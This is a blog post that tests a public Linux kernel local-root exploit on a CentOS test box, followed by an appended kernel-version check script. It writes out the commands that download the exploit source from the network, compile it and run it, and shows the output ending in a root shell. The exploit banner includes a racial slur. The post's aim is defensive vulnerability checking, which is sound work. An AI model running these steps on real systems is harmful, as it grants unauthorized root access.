The Linux Kernel exploit – become root by running 32bit code on a 64bit machine

There is a lot of discussion about one of the latest kernel exploits... the one where you can become root by running 32-bit code on a 64-bit machine. So I wanted to know whether I'm vulnerable as well... and I just wanted to know how it works :-)


So I simply did the following (as a normal user) on a vulnerable version of the Linux kernel on CentOS 5.5:


$ mkdir /tmp/expl
$ wget -O /tmp/expl/expl.c http://www.seclists.org/fulldisclosure/2010/Sep/att-268/ABftw_c.bin
$ gcc -m32 -o /tmp/expl/expl.exe /tmp/expl/expl.c


Now run the binary:


[pieter@testbox ~]$ whoami
pieter
[pieter@testbox ~]$ /tmp/expl/expl.exe
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-128.7.1.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff8030d360
$$$ dummy_security_ops->ffffffff80496c00
$$$ capability_ops->ffffffff8030ec20
$$$ selinux_enforcing->ffffffff80499960
$$$ audit_enabled->ffffffff80485124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP
sh-3.2# whoami
root
sh-3.2#


Well... I don't like that... so: update the kernel, reboot and check again!


[pieter@testbox ~]$ whoami
pieter
[pieter@testbox ~]$ /tmp/expl/expl.exe
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-194.17.1.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
!!! y0u fuq1ng f41l. g3t th3 fuq 0ut!
[pieter@testbox ~]$
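To check other boxes without compiling and running the exploit binary on each of them, here is an added example (my own script, not part of the original post): a small POSIX shell script that compares the running kernel release string against the release this box was updated to. It assumes that 2.6.18-194.17.1.el5 is the first release in this series on which the exploit fails, which is only what the output above shows for this box, not a confirmed fix boundary; take the real one from the vendor advisory.

```shell
#!/bin/sh
# Added example, not from the original post. Compares RPM-style kernel
# release strings such as "2.6.18-128.7.1.el5" numerically, field by field.
# ASSUMPTION: the release the post updated to is the first one on which the
# exploit fails; replace with the release named in the vendor advisory.
FIXED_RELEASE="2.6.18-194.17.1.el5"

# release_older_than A B: exit 0 if kernel release A is older than B.
# Each release is turned into a sortable key: strip the ".elN" suffix,
# split on "." and "-", zero-pad every numeric field to five digits.
release_older_than() {
    awk -v a="$1" -v b="$2" '
    function key(r,    n, f, i, out) {
        sub(/\.el[0-9]+$/, "", r)
        n = split(r, f, /[-.]/)
        out = ""
        for (i = 1; i <= n; i++) out = out sprintf("%05d", f[i])
        return out
    }
    BEGIN { exit !(key(a) < key(b)) }'
}

# kernel_older_than_fixed [RELEASE]: exit 0 if RELEASE (default: the
# running kernel) is older than FIXED_RELEASE and should be updated.
kernel_older_than_fixed() {
    release_older_than "${1:-$(uname -r)}" "$FIXED_RELEASE"
}

# Report on the running kernel when executed directly.
if kernel_older_than_fixed "$(uname -r)"; then
    echo "kernel $(uname -r) is older than $FIXED_RELEASE: update and reboot"
else
    echo "kernel $(uname -r) is at or beyond $FIXED_RELEASE"
fi
```

Pass an explicit release string as the first argument to kernel_older_than_fixed to check values collected from other hosts (for example from the output of uname -r over SSH).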